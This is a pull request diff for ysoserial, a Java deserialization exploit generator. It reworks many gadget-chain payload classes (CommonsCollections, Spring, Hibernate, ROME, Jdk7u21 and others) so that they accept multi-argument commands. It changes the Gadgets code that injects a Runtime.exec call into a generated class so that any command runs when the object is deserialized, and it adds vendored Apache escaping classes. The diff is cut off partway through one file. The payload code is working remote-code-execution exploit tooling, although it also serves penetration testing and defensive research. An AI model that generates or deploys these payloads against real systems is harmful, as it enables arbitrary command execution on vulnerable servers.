### PR TITLE
Add arguments support for many payloads

### DIFF
--- a/README.md
+++ b/README.md
@@ -41,7 +41,7 @@ are not responsible or liable for misuse of the software. Use responsibly.
 ```shell
 $  java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar
 Y SO SERIAL?
-Usage: java -jar ysoserial-[version]-all.jar payload command [arguments ...]'
+Usage: java -jar ysoserial-[version]-all.jar payload command [arguments ...]
   Available payload types:
      Payload             Authors                     Dependencies
      -------             -------                     ------------

--- a/README.md
+++ b/README.md
@@ -41,7 +41,7 @@ are not responsible or liable for misuse of the software. Use responsibly.
 ```shell
 $  java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar
 Y SO SERIAL?
-Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'
+Usage: java -jar ysoserial-[version]-all.jar payload command [arguments ...]'
   Available payload types:
      Payload             Authors                     Dependencies
      -------             -------                     ------------

--- a/pom.xml
+++ b/pom.xml
@@ -169,6 +169,11 @@
 			<artifactId>commons-text</artifactId>
 			<version>1.1</version>
 		</dependency>
+		<dependency>
+			<groupId>org.apache.commons</groupId>
+			<artifactId>commons-lang3</artifactId>
+			<version>3.6</version>
+		</dependency>
 
 		<!-- gadget dependecies -->
 

--- a/pom.xml
+++ b/pom.xml
@@ -164,6 +164,11 @@
 			<artifactId>remoting-jmx</artifactId>
 			<version>2.0.1.Final</version>
 		</dependency>
+		<dependency>
+			<groupId>org.apache.commons</groupId>
+			<artifactId>commons-text</artifactId>
+			<version>1.1</version>
+		</dependency>
 
 		<!-- gadget dependecies -->
 

--- a/pom.xml
+++ b/pom.xml
@@ -164,16 +164,6 @@
 			<artifactId>remoting-jmx</artifactId>
 			<version>2.0.1.Final</version>
 		</dependency>
-		<dependency>
-			<groupId>org.apache.commons</groupId>
-			<artifactId>commons-text</artifactId>
-			<version>1.1</version>
-		</dependency>
-		<dependency>
-			<groupId>org.apache.commons</groupId>
-			<artifactId>commons-lang3</artifactId>
-			<version>3.6</version>
-		</dependency>
 
 		<!-- gadget dependecies -->
 

--- a/src/main/java/ysoserial/Strings.java
+++ b/src/main/java/ysoserial/Strings.java
@@ -1,7 +1,5 @@
 package ysoserial;
 
-import org.apache.commons.lang.StringUtils;
-
 import java.util.Arrays;
 import java.util.Comparator;
 import java.util.LinkedList;
@@ -20,6 +18,10 @@ public class Strings {
         }
         return sb.toString();
     }
+
+	public static String join(Iterable<String> strings, String sep) {
+		return Strings.join(strings, sep, null, null);
+	}
 
     public static String repeat(String str, int num) {
         final String[] strs = new String[num];

--- a/src/main/java/ysoserial/payloads/CommonsBeanutils1.java
+++ b/src/main/java/ysoserial/payloads/CommonsBeanutils1.java
@@ -14,9 +14,9 @@ import ysoserial.payloads.util.Reflections;
 @SuppressWarnings({ "rawtypes", "unchecked" })
 @Dependencies({"commons-beanutils:commons-beanutils:1.9.2", "commons-collections:commons-collections:3.1", "commons-logging:commons-logging:1.2"})
 @Authors({ Authors.FROHOFF })
-public class CommonsBeanutils1 implements ObjectPayload<Object> {
+public class CommonsBeanutils1 extends ExtendedObjectPayload<Object> {
 
-	public Object getObject(final String command) throws Exception {
+	public Object getObject(final String[] command) throws Exception {
 		final Object templates = Gadgets.createTemplatesImpl(command);
 		// mock method name until armed
 		final BeanComparator comparator = new BeanComparator("lowestSetBit");

--- a/src/main/java/ysoserial/payloads/CommonsCollections2.java
+++ b/src/main/java/ysoserial/payloads/CommonsCollections2.java
@@ -27,9 +27,9 @@ import ysoserial.payloads.util.Reflections;
 @SuppressWarnings({ "rawtypes", "unchecked" })
 @Dependencies({ "org.apache.commons:commons-collections4:4.0" })
 @Authors({ Authors.FROHOFF })
-public class CommonsCollections2 implements ObjectPayload<Queue<Object>> {
+public class CommonsCollections2 extends ExtendedObjectPayload<Queue<Object>> {
 
-	public Queue<Object> getObject(final String command) throws Exception {
+	public Queue<Object> getObject(final String[] command) throws Exception {
 		final Object templates = Gadgets.createTemplatesImpl(command);
 		// mock method name until armed
 		final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);

--- a/src/main/java/ysoserial/payloads/CommonsCollections3.java
+++ b/src/main/java/ysoserial/payloads/CommonsCollections3.java
@@ -30,9 +30,9 @@ import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
 @PayloadTest ( precondition = "isApplicableJavaVersion")
 @Dependencies({"commons-collections:commons-collections:3.1"})
 @Authors({ Authors.FROHOFF })
-public class CommonsCollections3 extends PayloadRunner implements ObjectPayload<Object> {
+public class CommonsCollections3 extends ExtendedObjectPayload<Object> {
 
-	public Object getObject(final String command) throws Exception {
+	public Object getObject(final String[] command) throws Exception {
 		Object templatesImpl = Gadgets.createTemplatesImpl(command);
 
 		// inert chain for setup

--- a/src/main/java/ysoserial/payloads/CommonsCollections4.java
+++ b/src/main/java/ysoserial/payloads/CommonsCollections4.java
@@ -26,9 +26,9 @@ import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
 @SuppressWarnings({ "rawtypes", "unchecked", "restriction" })
 @Dependencies({"org.apache.commons:commons-collections4:4.0"})
 @Authors({ Authors.FROHOFF })
-public class CommonsCollections4 implements ObjectPayload<Queue<Object>> {
+public class CommonsCollections4 extends ExtendedObjectPayload<Queue<Object>> {
 
-	public Queue<Object> getObject(final String command) throws Exception {
+	public Queue<Object> getObject(final String[] command) throws Exception {
 		Object templates = Gadgets.createTemplatesImpl(command);
 
 		ConstantTransformer constant = new ConstantTransformer(String.class);

--- a/src/main/java/ysoserial/payloads/CommonsCollections5.java
+++ b/src/main/java/ysoserial/payloads/CommonsCollections5.java
@@ -54,10 +54,10 @@ https://github.com/JetBrains/jdk8u_jdk/commit/af2361ee2878302012214299036b3a8b4e
 @PayloadTest ( precondition = "isApplicableJavaVersion")
 @Dependencies({"commons-collections:commons-collections:3.1"})
 @Authors({ Authors.MATTHIASKAISER, Authors.JASINNER })
-public class CommonsCollections5 extends PayloadRunner implements ObjectPayload<BadAttributeValueExpException> {
+public class CommonsCollections5 extends ExtendedObjectPayload<BadAttributeValueExpException> {
 
-	public BadAttributeValueExpException getObject(final String command) throws Exception {
-		final String[] execArgs = new String[] { command };
+	public BadAttributeValueExpException getObject(final String[] command) throws Exception {
+		final String[] execArgs = command.clone();
 		// inert chain for setup
 		final Transformer transformerChain = new ChainedTransformer(
 		        new Transformer[]{ new ConstantTransformer(1) });

--- a/src/main/java/ysoserial/payloads/CommonsCollections6.java
+++ b/src/main/java/ysoserial/payloads/CommonsCollections6.java
@@ -35,11 +35,10 @@ import java.util.Map;
 @SuppressWarnings({"rawtypes", "unchecked"})
 @Dependencies({"commons-collections:commons-collections:3.1"})
 @Authors({ Authors.MATTHIASKAISER })
-public class CommonsCollections6 extends PayloadRunner implements ObjectPayload<Serializable> {
+public class CommonsCollections6 extends ExtendedObjectPayload<Serializable> {
 
-    public Serializable getObject(final String command) throws Exception {
-
-        final String[] execArgs = new String[] { command };
+    public Serializable getObject(final String[] command) throws Exception {
+        final String[] execArgs = command.clone();
 
         final Transformer[] transformers = new Transformer[] {
                 new ConstantTransformer(Runtime.class),

--- a/src/main/java/ysoserial/payloads/ExtendedObjectPayload.java
+++ b/src/main/java/ysoserial/payloads/ExtendedObjectPayload.java
@@ -1,11 +1,24 @@
 package ysoserial.payloads;
 
+import java.util.LinkedList;
+import java.util.List;
+import java.util.StringTokenizer;
+
 public abstract class ExtendedObjectPayload<T> implements ObjectPayload<T> {
 	abstract public T getObject(String[] command) throws Exception;
 	
+	/**
+	 * Method to keep backward compatibility with ObjectPayload
+	 * using StringTokenizer used in java.lang.Runtime.exec(String)
+	 */
 	@Override
 	public T getObject(String command) throws Exception {
-		// FIXME Use tokenizer
-		return this.getObject(new String[] { command });
+		final StringTokenizer tokenizer = new StringTokenizer(command);
+		final List<String> commandTokenized = new LinkedList<String>();
+		while (tokenizer.hasMoreTokens()) {
+			commandTokenized.add(tokenizer.nextToken());
+		}
+		final String[] commandTokenizedArray= commandTokenized.toArray(new String[0]);
+		return this.getObject(commandTokenizedArray);
 	}
 }

--- a/src/main/java/ysoserial/payloads/ExtendedObjectPayload.java
+++ b/src/main/java/ysoserial/payloads/ExtendedObjectPayload.java
@@ -1,0 +1,11 @@
+package ysoserial.payloads;
+
+public abstract class ExtendedObjectPayload<T> implements ObjectPayload<T> {
+	abstract public T getObject(String[] command) throws Exception;
+	
+	@Override
+	public T getObject(String command) throws Exception {
+		// FIXME Use tokenizer
+		return this.getObject(new String[] { command });
+	}
+}

--- a/src/main/java/ysoserial/payloads/Hibernate1.java
+++ b/src/main/java/ysoserial/payloads/Hibernate1.java
@@ -37,7 +37,7 @@ import ysoserial.payloads.util.Reflections;
  * @author mbechler
  */
 @Authors({ Authors.MBECHLER })
-public class Hibernate1 implements ObjectPayload<Object>, DynamicDependencies {
+public class Hibernate1 extends ExtendedObjectPayload<Object> implements DynamicDependencies {
 
     public static String[] getDependencies () {
         if ( System.getProperty("hibernate5") != null ) {
@@ -96,7 +96,7 @@ public class Hibernate1 implements ObjectPayload<Object>, DynamicDependencies {
     }
 
 
-    public Object getObject ( String command ) throws Exception {
+    public Object getObject ( String[] command ) throws Exception {
         Object tpl = Gadgets.createTemplatesImpl(command);
         Object getters = makeGetter(tpl.getClass(), "getOutputProperties");
         return makeCaller(tpl, getters);

--- a/src/main/java/ysoserial/payloads/JBossInterceptors1.java
+++ b/src/main/java/ysoserial/payloads/JBossInterceptors1.java
@@ -30,9 +30,9 @@ import java.util.*;
     "javax.enterprise:cdi-api:1.0-SP1", "javax.interceptor:javax.interceptor-api:3.1",
     "org.jboss.interceptor:jboss-interceptor-spi:2.0.0.Final", "org.slf4j:slf4j-api:1.7.21" })
 @Authors({ Authors.MATTHIASKAISER })
-public class JBossInterceptors1 implements ObjectPayload<Object> {
+public class JBossInterceptors1 extends ExtendedObjectPayload<Object> {
 
-    public Object getObject(final String command) throws Exception {
+    public Object getObject(final String[] command) throws Exception {
 
         final Object gadget = Gadgets.createTemplatesImpl(command);
 

--- a/src/main/java/ysoserial/payloads/JSON1.java
+++ b/src/main/java/ysoserial/payloads/JSON1.java
@@ -66,9 +66,9 @@ import net.sf.json.JSONObject;
     "net.sf.ezmorph:ezmorph:1.0.6", "commons-beanutils:commons-beanutils:1.9.2",
     "org.springframework:spring-core:4.1.4.RELEASE", "commons-collections:commons-collections:3.1" })
 @Authors({ Authors.MBECHLER })
-public class JSON1 implements ObjectPayload<Object> {
+public class JSON1 extends ExtendedObjectPayload<Object> {
 
-    public Map getObject ( String command ) throws Exception {
+    public Map getObject ( String[] command ) throws Exception {
         return makeCallerChain(Gadgets.createTemplatesImpl(command), Templates.class);
     }
 

--- a/src/main/java/ysoserial/payloads/JavassistWeld1.java
+++ b/src/main/java/ysoserial/payloads/JavassistWeld1.java
@@ -30,9 +30,9 @@ import java.util.*;
     "javax.enterprise:cdi-api:1.0-SP1", "javax.interceptor:javax.interceptor-api:3.1",
     "org.jboss.interceptor:jboss-interceptor-spi:2.0.0.Final", "org.slf4j:slf4j-api:1.7.21" })
 @Authors({ Authors.MATTHIASKAISER })
-public class JavassistWeld1 implements ObjectPayload<Object> {
+public class JavassistWeld1 extends ExtendedObjectPayload<Object> {
 
-    public Object getObject(final String command) throws Exception {
+    public Object getObject(final String[] command) throws Exception {
 
         final Object gadget = Gadgets.createTemplatesImpl(command);
 

--- a/src/main/java/ysoserial/payloads/Jdk7u21.java
+++ b/src/main/java/ysoserial/payloads/Jdk7u21.java
@@ -57,9 +57,9 @@ LinkedHashSet.readObject()
 @PayloadTest ( precondition = "isApplicableJavaVersion")
 @Dependencies()
 @Authors({ Authors.FROHOFF })
-public class Jdk7u21 implements ObjectPayload<Object> {
+public class Jdk7u21 extends ExtendedObjectPayload<Object> {
 
-	public Object getObject(final String command) throws Exception {
+	public Object getObject(final String[] command) throws Exception {
 		final Object templates = Gadgets.createTemplatesImpl(command);
 
 		String zeroHashCodeStr = "f5a5a608";

--- a/src/main/java/ysoserial/payloads/MozillaRhino1.java
+++ b/src/main/java/ysoserial/payloads/MozillaRhino1.java
@@ -21,9 +21,9 @@ import java.lang.reflect.Method;
 @PayloadTest( precondition = "isApplicableJavaVersion")
 @Dependencies({"rhino:js:1.7R2"})
 @Authors({ Authors.MATTHIASKAISER })
-public class MozillaRhino1 implements ObjectPayload<Object> {
+public class MozillaRhino1 extends ExtendedObjectPayload<Object> {
 
-    public Object getObject(final String command) throws Exception {
+    public Object getObject(final String[] command) throws Exception {
 
         Class nativeErrorClass = Class.forName("org.mozilla.javascript.NativeError");
         Constructor nativeErrorConstructor = nativeErrorClass.getDeclaredConstructor();

--- a/src/main/java/ysoserial/payloads/ROME.java
+++ b/src/main/java/ysoserial/payloads/ROME.java
@@ -30,9 +30,9 @@ import ysoserial.payloads.util.PayloadRunner;
  */
 @Dependencies("rome:rome:1.0")
 @Authors({ Authors.MBECHLER })
-public class ROME implements ObjectPayload<Object> {
+public class ROME extends ExtendedObjectPayload<Object> {
 
-    public Object getObject ( String command ) throws Exception {
+    public Object getObject ( String[] command ) throws Exception {
         Object o = Gadgets.createTemplatesImpl(command);
         ObjectBean delegate = new ObjectBean(Templates.class, o);
         ObjectBean root  = new ObjectBean(ObjectBean.class, delegate);

--- a/src/main/java/ysoserial/payloads/Spring1.java
+++ b/src/main/java/ysoserial/payloads/Spring1.java
@@ -51,9 +51,9 @@ import ysoserial.payloads.util.Reflections;
 @PayloadTest ( precondition = "isApplicableJavaVersion")
 @Dependencies({"org.springframework:spring-core:4.1.4.RELEASE","org.springframework:spring-beans:4.1.4.RELEASE"})
 @Authors({ Authors.FROHOFF })
-public class Spring1 extends PayloadRunner implements ObjectPayload<Object> {
+public class Spring1 extends ExtendedObjectPayload<Object> {
 
-	public Object getObject(final String command) throws Exception {
+	public Object getObject(final String[] command) throws Exception {
 		final Object templates = Gadgets.createTemplatesImpl(command);
 
 		final ObjectFactory objectFactoryProxy =

--- a/src/main/java/ysoserial/payloads/Spring2.java
+++ b/src/main/java/ysoserial/payloads/Spring2.java
@@ -43,9 +43,9 @@ import ysoserial.payloads.util.Reflections;
     "aopalliance:aopalliance:1.0", "commons-logging:commons-logging:1.2"
 } )
 @Authors({ Authors.MBECHLER })
-public class Spring2 extends PayloadRunner implements ObjectPayload<Object> {
+public class Spring2 extends ExtendedObjectPayload<Object> {
 
-    public Object getObject ( final String command ) throws Exception {
+    public Object getObject ( final String[] command ) throws Exception {
         final Object templates = Gadgets.createTemplatesImpl(command);
 
         AdvisedSupport as = new AdvisedSupport();

--- a/src/main/java/ysoserial/payloads/util/Gadgets.java
+++ b/src/main/java/ysoserial/payloads/util/Gadgets.java
@@ -26,6 +26,7 @@ import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
 import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
 import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
 
+import org.apache.commons.lang3.StringUtils;
 import org.apache.commons.text.StringEscapeUtils;
 
 
@@ -121,7 +122,7 @@ public class Gadgets {
         for (String param : command) {
                escapedParams.add("\"" + StringEscapeUtils.escapeJava(param) + "\"");
         }
-        String cmd = "java.lang.Runtime.getRuntime().exec(new String[] {" + String.join(", ", escapedParams) + "});";
+        String cmd = "java.lang.Runtime.getRuntime().exec(new String[] {" + StringUtils.join(escapedParams, ", ") + "});";
 
         clazz.makeClassInitializer().insertAfter(cmd);
         // sortarandom name to allow repeated exploitation (watch out for PermGen exhaustion)

--- a/src/main/java/ysoserial/payloads/util/Gadgets.java
+++ b/src/main/java/ysoserial/payloads/util/Gadgets.java
@@ -17,6 +17,8 @@ import java.util.Map;
 import javassist.ClassClassPath;
 import javassist.ClassPool;
 import javassist.CtClass;
+import ysoserial.Strings;
+import ysoserial.translate.JavaEscaper;
 
 import com.sun.org.apache.xalan.internal.xsltc.DOM;
 import com.sun.org.apache.xalan.internal.xsltc.TransletException;
@@ -25,9 +27,6 @@ import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
 import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
 import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
 import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
-
-import org.apache.commons.lang3.StringUtils;
-import org.apache.commons.text.StringEscapeUtils;
 
 
 /*
@@ -120,9 +119,9 @@ public class Gadgets {
         // TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections
         final List<String> escapedParams = new LinkedList<String>();
         for (String param : command) {
-               escapedParams.add("\"" + StringEscapeUtils.escapeJava(param) + "\"");
+               escapedParams.add("\"" + JavaEscaper.escapeJava(param) + "\"");
         }
-        String cmd = "java.lang.Runtime.getRuntime().exec(new String[] {" + StringUtils.join(escapedParams, ", ") + "});";
+        String cmd = "java.lang.Runtime.getRuntime().exec(new String[] {" + Strings.join(escapedParams, ", ") + "});";
 
         clazz.makeClassInitializer().insertAfter(cmd);
         // sortarandom name to allow repeated exploitation (watch out for PermGen exhaustion)

--- a/src/main/java/ysoserial/payloads/util/Gadgets.java
+++ b/src/main/java/ysoserial/payloads/util/Gadgets.java
@@ -26,6 +26,8 @@ import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
 import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
 import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
 
+import org.apache.commons.text.StringEscapeUtils;
+
 
 /*
  * utility generator functions for common jdk-only gadgets
@@ -117,7 +119,7 @@ public class Gadgets {
         // TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections
         final List<String> escapedParams = new LinkedList<String>();
         for (String param : command) {
-               escapedParams.add("\"" + param.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") + "\"");
+               escapedParams.add("\"" + StringEscapeUtils.escapeJava(param) + "\"");
         }
         String cmd = "java.lang.Runtime.getRuntime().exec(new String[] {" + String.join(", ", escapedParams) + "});";
 

--- a/src/main/java/ysoserial/translate/AggregateTranslator.java
+++ b/src/main/java/ysoserial/translate/AggregateTranslator.java
@@ -1,0 +1,68 @@
+/*
+ * Licensed to the Apache Software Foundation (ASF) under one or more
+ * contributor license agreements.  See the NOTICE file distributed with
+ * this work for additional information regarding copyright ownership.
+ * The ASF licenses this file to You under the Apache License, Version 2.0
+ * (the "License"); you may not use this file except in compliance with
+ * the License.  You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package ysoserial.translate;
+
+import java.io.IOException;
+import java.io.Writer;
+import java.util.ArrayList;
+import java.util.List;
+
+/**
+ * Executes a sequence of translators one after the other. Execution ends whenever
+ * the first translator consumes codepoints from the input.
+ *
+ * @since 1.0
+ */
+public class AggregateTranslator extends CharSequenceTranslator {
+
+    /**
+     * Translator list.
+     */
+    private final List<CharSequenceTranslator> translators = new ArrayList<CharSequenceTranslator>();
+
+    /**
+     * Specify the translators to be used at creation time.
+     *
+     * @param translators CharSequenceTranslator array to aggregate
+     */
+    public AggregateTranslator(final CharSequenceTranslator... translators) {
+        if (translators != null) {
+            for (CharSequenceTranslator translator : translators) {
+                if (translator != null) {
+                    this.translators.add(translator);
+                }
+            }
+        }
+    }
+
+    /**
+     * The first translator to consume codepoints from the input is the 'winner'.
+     * Execution stops with the number of consumed codepoints being returned.
+     * {@inheritDoc}
+     */
+    @Override
+    public int translate(final CharSequence input, final int index, final Writer out) throws IOException {
+        for (final CharSequenceTranslator translator : translators) {
+            final int consumed = translator.translate(input, index, out);
+            if (consumed != 0) {
+                return consumed;
+            }
+        }
+        return 0;
+    }
+
+}

--- a/src/main/java/ysoserial/translate/CharSequenceTranslator.java
+++ b/src/main/java/ysoserial/translate/CharSequenceTranslator.java
@@ -1,0 +1,138 @@
+/*
+ * Licensed to the Apache Software Foundation (ASF) under one or more
+ * contributor license agreements.  See the NOTICE file distributed with
+ * this work for additional information regarding copyright ownership.
+ * The ASF licenses this file to You under the Apache License, Version 2.0
+ * (the "License"); you may not use this file except in compliance with
+ * the License.  You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package ysoserial.translate;
+
+import java.io.IOException;
+import java.io.StringWriter;
+import java.io.Writer;
+import java.util.Locale;
+
+/**
+ * An API for translating text.
+ * Its core use is to escape and unescape text. Because escaping and unescaping
+ * is completely contextual, the API does not present two separate signatures.
+ *
+ * @since 1.0
+ */
+public abstract class CharSequenceTranslator {
+
+    /**
+     * Array containing the hexadecimal alphabet.
+     */
+    static final char[] HEX_DIGITS = new char[] {'0', '1', '2', '3',
+                                                 '4', '5', '6', '7',
+                                                 '8', '9', 'A', 'B',
+                                                 'C', 'D', 'E', 'F'};
+
+    /**
+     * Translate a set of codepoints, represented by an int index into a CharSequence,
+     * into another set of codepoints. The number of codepoints consumed must be returned,
+     * and the only IOExceptions thrown must be from interacting with the Writer so that
+     * the top level API may reliably ignore StringWriter IOExceptions.
+     *
+     * @param input CharSequence that is being translated
+     * @param index int representing the current point of translation
+     * @param out Writer to translate the text to
+     * @return int count of codepoints consumed
+     * @throws IOException if and only if the Writer produces an IOException
+     */
+    public abstract int translate(CharSequence input, int index, Writer out) throws IOException;
+
+    /**
+     * Helper for non-Writer usage.
+     * @param input CharSequence to be translated
+     * @return String output of translation
+     */
+    public final String translate(final CharSequence input) {
+        if (input == null) {
+            return null;
+        }
+        try {
+            final StringWriter writer = new StringWriter(input.length() * 2);
+            translate(input, writer);
+            return writer.toString();
+        } catch (final IOException ioe) {
+            // this should never ever happen while writing to a StringWriter
+            throw new RuntimeException(ioe);
+        }
+    }
+
+    /**
+     * Translate an input onto a Writer. This is intentionally final as its algorithm is
+     * tightly coupled with the abstract method of this class.
+     *
+     * @param input CharSequence that is being translated
+     * @param out Writer to translate the text to
+     * @throws IOException if and only if the Writer produces an IOException
+     */
+    public final void translate(final CharSequence input, final Writer out) throws IOException {
+        if (input == null) {
+            return;
+        }
+        int pos = 0;
+        final int len = input.length();
+        while (pos < len) {
+            final int consumed = translate(input, pos, out);
+            if (consumed == 0) {
+                // inlined implementation of Character.toChars(Character.codePointAt(input, pos))
+                // avoids allocating temp char arrays and duplicate checks
+                final char c1 = input.charAt(pos);
+                out.write(c1);
+                pos++;
+                if (Character.isHighSurrogate(c1) && pos < len) {
+                    final char c2 = input.charAt(pos);
+                    if (Character.isLowSurrogate(c2)) {
+                      out.write(c2);
+                      pos++;
+                    }
+                }
+                continue;
+            }
+            // contract with translators is that they have to understand codepoints
+            // and they just took care of a surrogate pair
+            for (int pt = 0; pt < consumed; pt++) {
+                pos += Character.charCount(Character.codePointAt(input, pos));
+            }
+        }
+    }
+
+    /**
+     * Helper method to create a merger of this translator with another set of
+     * translators. Useful in customizing the standard functionality.
+     *
+     * @param translators CharSequenceTranslator array of translators to merge with this one
+     * @return CharSequenceTranslator merging this translator with the others
+     */
+    public final CharSequenceTranslator with(final CharSequenceTranslator... translators) {
+        final CharSequenceTranslator[] newArray = new CharSequenceTranslator[translators.length + 1];
+        newArray[0] = this;
+        System.arraycopy(translators, 0, newArray, 1, translators.length);
+        return new AggregateTranslator(newArray);
+    }
+
+    /**
+     * <p>Returns an upper case hexadecimal <code>String</code> for the given
+     * character.</p>
+     *
+     * @param codepoint The codepoint to convert.
+     * @return An upper case hexadecimal <code>String</code>
+     */
+    public static String hex(final int codepoint) {
+        return Integer.toHexString(codepoint).toUpperCase(Locale.ENGLISH);
+    }
+
+}

--- a/src/main/java/ysoserial/translate/CodePointTranslator.java
+++ b/src/main/java/ysoserial/translate/CodePointTranslator.java
@@ -1,0 +1,51 @@
+/*
+ * Licensed to the Apache Software Foundation (ASF) under one or more
+ * contributor license agreements.  See the NOTICE file distributed with
+ * this work for additional information regarding copyright ownership.
+ * The ASF licenses this file to You under the Apache License, Version 2.0
+ * (the "License"); you may not use this file except in compliance with
+ * the License.  You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package ysoserial.translate;
+
+import java.io.IOException;
+import java.io.Writer;
+
+/**
+ * Helper subclass to CharSequenceTranslator to allow for translations that
+ * will replace up to one character at a time.
+ *
+ * @since 1.0
+ */
+public abstract class CodePointTranslator extends CharSequenceTranslator {
+
+    /**
+     * Implementation of translate that maps onto the abstract translate(int, Writer) method.
+     * {@inheritDoc}
+     */
+    @Override
+    public final int translate(final CharSequence input, final int index, final Writer out) throws IOException {
+        final int codepoint = Character.codePointAt(input, index);
+        final boolean consumed = translate(codepoint, out);
+        return consumed ? 1 : 0;
+    }
+
+    /**
+     * Translate the specified codepoint into another.
+     *
+     * @param codepoint int character input to translate
+     * @param out Writer to optionally push the translated output to
+     * @return boolean as to whether translation occurred or not
+     * @throws IOException if and only if the Writer produces an IOException
+     */
+    public abstract boolean translate(int codepoint, Writer out) throws IOException;
+
+}

--- a/src/main/java/ysoserial/translate/JavaEscaper.java
+++ b/src/main/java/ysoserial/translate/JavaEscaper.java
@@ -1,0 +1,33 @@
+package ysoserial.translate;
+
+import java.util.Collections;
+import java.util.HashMap;
+import java.util.Map;
+
+public class JavaEscaper {
+    public static final Map<CharSequence, CharSequence> JAVA_CTRL_CHARS_ESCAPE;
+    public static final CharSequenceTranslator ESCAPE_JAVA;
+
+    static {
+        Map<CharSequence, CharSequence> initialMap = new HashMap<CharSequence, CharSequence>();
+        initialMap.put("\b", "\\b");
+        initialMap.put("\n", "\\n");
+        initialMap.put("\t", "\\t");
+        initialMap.put("\f", "\\f");
+        initialMap.put("\r", "\\r");
+        JAVA_CTRL_CHARS_ESCAPE = Collections.unmodifiableMap(initialMap);
+    	
+        Map<CharSequence, CharSequence> escapeJavaMap = new HashMap<CharSequence, CharSequence>();
+        escapeJavaMap.put("\"", "\\\"");
+        escapeJavaMap.put("\\", "\\\\");
+        ESCAPE_JAVA = new AggregateTranslator(
+                new LookupTranslator(Collections.unmodifiableMap(escapeJavaMap)),
+                new LookupTranslator(JAVA_CTRL_CHARS_ESCAPE),
+                JavaUnicodeEscaper.outsideOf(32, 0x7f)
+        );
+    }
+    
+    public static final String escapeJava(final String input) {
+        return ESCAPE_JAVA.translate(input);
+    }
+}

--- a/src/main/java/ysoserial/translate/JavaUnicodeEscaper.java
+++ b/src/main/java/ysoserial/translate/JavaUnicodeEscaper.java
@@ -1,0 +1,113 @@
+/*
+ * Licensed to the Apache Software Foundation (ASF) under one or more
+ * contributor license agreements.  See the NOTICE file distributed with
+ * this work for additional information regarding copyright ownership.
+ * The ASF licenses this file to You under the Apache License, Version 2.0
+ * (the "License"); you may not use this file except in compliance with
+ * the License.  You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package ysoserial.translate;
+
+/**
+ * Translates codepoints to their Unicode escaped value suitable for Java source.
+ *
+ * @since 1.0
+ */
+public class JavaUnicodeEscaper extends UnicodeEscaper {
+
+    /**
+     * <p>
+     * Constructs a <code>JavaUnicodeEscaper</code> above the specified value (exclusive).
+     * </p>
+     *
+     * @param codepoint
+     *            above which to escape
+     * @return the newly created {@code UnicodeEscaper} instance
+     */
+    public static JavaUnicodeEscaper above(final int codepoint) {
+        return outsideOf(0, codepoint);
+    }
+
+    /**
+     * <p>
+     * Constructs a <code>JavaUnicodeEscaper</code> below the specified value (exclusive).
+     * </p>
+     *
+     * @param codepoint
+     *            below which to escape
+     * @return the newly created {@code UnicodeEscaper} instance
+     */
+    public static JavaUnicodeEscaper below(final int codepoint) {
+        return outsideOf(codepoint, Integer.MAX_VALUE);
+    }
+
+    /**
+     * <p>
+     * Constructs a <code>JavaUnicodeEscaper</code> between the specified values (inclusive).
+     * </p>
+     *
+     * @param codepointLow
+     *            above which to escape
+     * @param codepointHigh
+     *            below which to escape
+     * @return the newly created {@code UnicodeEscaper} instance
+     */
+    public static JavaUnicodeEscaper between(final int codepointLow, final int codepointHigh) {
+        return new JavaUnicodeEscaper(codepointLow, codepointHigh, true);
+    }
+
+    /**
+     * <p>
+     * Constructs a <code>JavaUnicodeEscaper</code> outside of the specified values (exclusive).
+     * </p>
+     *
+     * @param codepointLow
+     *            below which to escape
+     * @param codepointHigh
+     *            above which to escape
+     * @return the newly created {@code UnicodeEscaper} instance
+     */
+    public static JavaUnicodeEscaper outsideOf(final int codepointLow, final int codepointHigh) {
+        return new JavaUnicodeEscaper(codepointLow, codepointHigh, false);
+    }
+
+    /**
+     * <p>
+     * Constructs a <code>JavaUnicodeEscaper</code> for the specified range. This is the underlying method for the
+     * other constructors/builders. The <code>below</code> and <code>above</code> boundaries are inclusive when
+     * <code>between</code> is <code>true</code> and exclusive when it is <code>false</code>.
+     * </p>
+     *
+     * @param below
+     *            int value representing the lowest codepoint boundary
+     * @param above
